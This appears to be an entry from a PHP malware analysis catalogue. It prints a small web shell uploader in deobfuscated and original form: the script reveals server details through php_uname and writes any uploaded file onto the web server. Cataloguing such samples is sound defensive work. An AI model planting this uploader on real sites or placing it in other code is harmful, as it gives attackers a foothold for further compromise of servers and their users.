PHP Malware Analysis

Back to list

Tags

Input
_POST
Environment
php_uname

Deobfuscated code

<?php

echo '<pre>' . php_uname() . "\n" . '<br/><form method="post" enctype="multipart/form-data"><input type="file" name="__"><input name="_" type="submit" value="Upload"></form>';
if ($_POST) {
    if (@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])) {
        echo "OK";
    } else {
        echo "ER";
    }
}


Original code

<?php echo '<pre>'.php_uname()."\n".'<br/><form method="post" enctype="multipart/form-data"><input type="file" name="__"><input name="_" type="submit" value="Upload"></form>';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo 'OK';}else{echo 'ER';}}?>